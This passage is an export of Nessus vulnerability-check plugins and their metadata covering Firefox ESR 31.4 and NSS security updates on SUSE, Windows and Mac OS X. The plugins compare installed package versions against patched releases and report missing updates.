\"CVE-2014-8641\");\n\n script_name(english:\"SuSE 11.3 Security Update : Mozilla Firefox (SAT Patch Number 10225)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs\nand security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and\nupdating the root certificate list.\n\nFor more information, please see\nhttps://www.mozilla.org/en-US/security/advisories/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=910647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=910669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913102\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913103\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=913104\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-1569.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8634.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8636.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8638.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8641.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10225.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libfreebl3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsoftokn3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libsoftokn3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"MozillaFirefox-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"MozillaFirefox-translations-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libfreebl3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libsoftokn3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"mozilla-nss-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"mozilla-nss-tools-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"MozillaFirefox-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libfreebl3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libsoftokn3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nss-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nss-tools-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"MozillaFirefox-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"MozillaFirefox-translations-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"libfreebl3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"libsoftokn3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"mozilla-nss-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"i586\", reference:\"mozilla-nss-tools-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"MozillaFirefox-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-31.4.0esr-0.8.7\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libfreebl3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libsoftokn3-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nss-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.17.3-0.8.11\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"mozilla-nss-tools-3.17.3-0.8.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:55:28", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and updating the root certificates list.\n\nFor more information, please refer to https://www.mozilla.org/en-US/security/advisories/ .\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : Mozilla Firefox (SUSE-SU-2015:0173-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-1569", "CVE-2014-8634", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:libfreebl3", "p-cpe:/a:novell:suse_linux:mozilla-nss", "p-cpe:/a:novell:suse_linux:mozilla-nss-devel", "p-cpe:/a:novell:suse_linux:mozilla-nss-tools", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2015-0173-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83677", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0173-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83677);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8636\", \"CVE-2014-8637\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\");\n script_bugtraq_id(71675, 72041, 72044, 72045, 72046, 72047, 72048, 72049);\n\n script_name(english:\"SUSE SLES11 Security Update : Mozilla Firefox (SUSE-SU-2015:0173-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs\nand security issues.\n\nMozilla NSS has been updated to 3.17.3, fixing a security issue and\nupdating the root certificates list.\n\nFor more information, please refer to\nhttps://www.mozilla.org/en-US/security/advisories/ .\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=906111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910647\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910669\"\n );\n # https://download.suse.com/patch/finder/?keywords=962d0b7b7ca9d1110cf2d237780cdab1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42f36f07\"\n );\n # https://download.suse.com/patch/finder/?keywords=f7933e6a871816421d62da119130434e\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3bb7c027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-1569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8634/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8636/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8637/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8638/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8639/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8640/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8641/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150173-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dea0d08a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11 SP2 LTSS :\n\nzypper in -t patch slessp2-firefox-201501-10167\n\nSUSE Linux Enterprise Server 11 SP1 LTSS :\n\nzypper in -t patch slessp1-firefox-201501-10168\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox Proxy Prototype Privileged Javascript Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"MozillaFirefox-31.4.0esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"MozillaFirefox-translations-31.4.0esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"libfreebl3-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"mozilla-nss-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"1\", reference:\"mozilla-nss-tools-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"MozillaFirefox-31.4.0esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"MozillaFirefox-translations-31.4.0esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"libfreebl3-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"mozilla-nss-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"mozilla-nss-devel-3.17.3-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"mozilla-nss-tools-3.17.3-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla Firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:17", "description": "The version of Firefox ESR 31.x installed on the remote Windows host is prior to 31.4. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Firefox ESR 31.x < 31.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MOZILLA_FIREFOX_31_4_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/80522", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80522);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8634\",\n \"CVE-2014-8635\",\n \"CVE-2014-8638\",\n \"CVE-2014-8639\",\n \"CVE-2014-8641\"\n );\n script_bugtraq_id(\n 72044,\n 72046,\n 72047,\n 72049,\n 72050\n );\n\n script_name(english:\"Firefox ESR 31.x < 31.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR 31.x installed on the remote Windows host\nis prior to 31.4. It is, therefore, affected by the following\nvulnerabilities :\n\n - Multiple unspecified memory safety issues exist within\n the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it\n does not follow the cross-origin resource sharing\n specification. This results in requests from\n 'sendBeacon()' lacking an 'origin' header, which allows\n malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication\n responses with a 'set-cookie' header. This can allow\n a session-fixation attack. (CVE-2014-8639)\n\n - A read-after-free flaw exists in WebRTC due to the way\n tracks are handled, which can result in a potentially\n exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox ESR 31.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:TRUE, fix:'31.4', min:'31.0', severity:SECURITY_HOLE, xss:FALSE, xsrf:TRUE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:46:48", "description": "The version of Firefox ESR 31.x installed on the remote Mac OS X host is prior to 31.4. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple unspecified memory safety issues exist within the browser engine. (CVE-2014-8634, CVE-2014-8635)\n\n - A flaw exists in 'navigator.sendBeacon()' in which it does not follow the cross-origin resource sharing specification. This results in requests from 'sendBeacon()' lacking an 'origin' header, which allows malicious sites to perform XSRF attacks. (CVE-2014-8638)\n\n - A flaw exists when receiving 407 Proxy Authentication responses with a 'set-cookie' header. This can allow a session-fixation attack. (CVE-2014-8639)\n\n - A read-after-free flaw exists in WebRTC due to the way tracks are handled, which can result in a potentially exploitable crash or incorrect WebRTC behavior.\n (CVE-2014-8641)", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "nessus", "title": "Firefox ESR 31.x < 31.4 Multiple Vulnerabilities (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2019-11-25T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": 